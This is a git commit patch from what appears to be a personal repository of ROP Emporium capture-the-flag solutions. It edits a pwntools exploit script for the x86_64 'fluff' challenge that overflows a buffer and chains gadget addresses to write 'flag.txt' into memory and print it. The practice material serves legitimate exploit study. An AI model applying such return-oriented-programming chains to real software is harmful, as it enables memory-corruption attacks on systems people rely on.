From 406768c5fead9fcadc9dc466da4286e5ac3c7274 Mon Sep 17 00:00:00 2001 From: Brett Weiland Date: Fri, 18 Dec 2020 01:42:14 -0600 Subject: deleted: x86_64/badchars/core modified: x86_64/fluff/.gdb_history deleted: x86_64/fluff/core modified: x86_64/fluff/exploit.py deleted: x86_64/ret2win/core deleted: x86_64/split/core deleted: x86_64/write4/core --- x86_64/fluff/exploit.py | 30 ++++++++++++++---------------- 1 file changed, 14 insertions(+), 16 deletions(-) (limited to 'x86_64/fluff/exploit.py') diff --git a/x86_64/fluff/exploit.py b/x86_64/fluff/exploit.py index cdf5de8..2b520d8 100755 --- a/x86_64/fluff/exploit.py +++ b/x86_64/fluff/exploit.py @@ -13,37 +13,35 @@ letter_lookups = { def write_str(dest, string, payload): payload += p64(0x00000000004006a3) payload += p64(dest) - for c in string: - payload += p64(0x40062a) - payload += p64(0x4000) # if things go wrong, check endian/order + payload += p64(0x0000000000400610) + payload += p64(1) + payload += p64(0x40062a) + payload += p64(0x4000) + payload += p64(letter_lookups[string[0]] - 0x3ef2) + payload += p64(0x400628) + payload += p64(0x400639) + + + for c in string[1:]: + payload += p64(0x40062b) payload += p64(letter_lookups[c] - 0x3ef2) - payload += p64(0x0000000000400610) - payload += p64(0) - + payload += p64(1) payload += p64(0x400628) - payload += p64(0x400639) return(payload) -prog = gdb.debug('./fluff', gdbscript=''' -break *pwnme + 151 -''' -) +prog = process('./fluff') payload = b'' for c in range(40): payload += b'a' payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload) payload += p64(0x00000000004006a3) -payload += p64(0x601be0) # set rdi - +payload += p64(0x601be0) payload += p64(0x0000000000400510) -payload += b"\n" prog.sendline(payload) -sleep(1) -print(str(prog.recv(), 'UTF-8')) prog.interactive() -- cgit v1.2.3